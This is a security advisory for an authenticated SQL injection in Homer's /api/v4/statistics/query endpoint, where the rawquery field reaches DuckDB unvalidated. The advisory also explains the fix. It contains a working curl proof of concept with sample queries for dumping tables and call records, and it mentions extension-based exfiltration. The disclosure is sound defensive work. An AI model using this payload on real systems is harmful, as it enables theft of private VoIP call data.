CVE-2026-62251: Homer: Authenticated SQL Injection via Unvalidated rawquery Field in /api/v4/statistics/query
### Summary The `V4StatisticsQuery` handler passes the user-supplied `rawquery` field directly to DuckDB without calling the `sqlvalidator.ValidateRawSQL` function used throughout the rest of the codebase. Any authenticated user can execute arbitrary SQL statements against all data accessible through the FlightSQL service. ### Details **`coordinator/handlers/statistics_v4.go` lines 74-107** — `V4StatisticsQuery`: ```go query := &model.V4StatisticsQuery{} if err = c.Bind(query); err != nil { ... } // No ValidateRawSQL call here — contrast with other handlers: results, err := h.flightService.Query(c.Request().Context(), query.RawQuery) ``` **Contrast with `coordinator/handlers/search.go` line 194** — secure pattern not followed: ```go if err := sqlvalidator.ValidateRawSQL(rawQuery); err != nil { return c.JSON(http.StatusBadRequest, ...) } ``` `query.RawQuery` is whatever the caller submitted; it is passed verbatim to the FlightSQL/DuckDB backend. The handler is registered under the `protected` group (requires JWT), but given that the default JWT secret is empty (see related advisory), this is effectively pre-authentication on a default deployment. ### PoC ```bash # With a valid JWT (or empty JWT secret bypass): curl -s -X POST http://<homer-host>/api/v4/statistics/query \ -H "Authorization: Bearer <jwt>" \ -H "Content-Type: application/json" \ -d '{ "param": { "query": [{"rawquery": "SELECT * FROM information_schema.tables"}] } }' # Returns all table names accessible to the DuckDB FlightSQL service # Exfiltrate all stored call records: # "rawquery": "SELECT * FROM hep LIMIT 1000" # Arbitrary DuckDB SQL is accepted including INSTALL/LOAD for extension-based exfiltration ``` ### Impact SQL Injection / Improper Neutralization of Special Elements (CWE-89). Any authenticated user can execute arbitrary SQL against all data accessible to the FlightSQL/DuckDB backend — including all stored VoIP call records, SIP messages, and metadata. Combined with the authentication bypass when JWT secret is empty, this is exploitable without credentials. ### Fix Apply `sqlvalidator.ValidateRawSQL()` to `query.RawQuery` before passing it to `h.flightService.Query()`, matching the pattern already used in `search.go` and `transactions_v4.go`. If possible, please apply for a CVE number when posting.
Recommended action
Recommended action
Upgrade affected packages to a patched version: github.com/sipcapture/homer-app 0.0.0-20260625085520-a7d027dc684b.
Technical details
- Vendor
- Not specified
- Product
- github.com/sipcapture/homer-app
- Exploitation
- none known
- Evidence
- official
Evidence and sources
This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.
Open primary source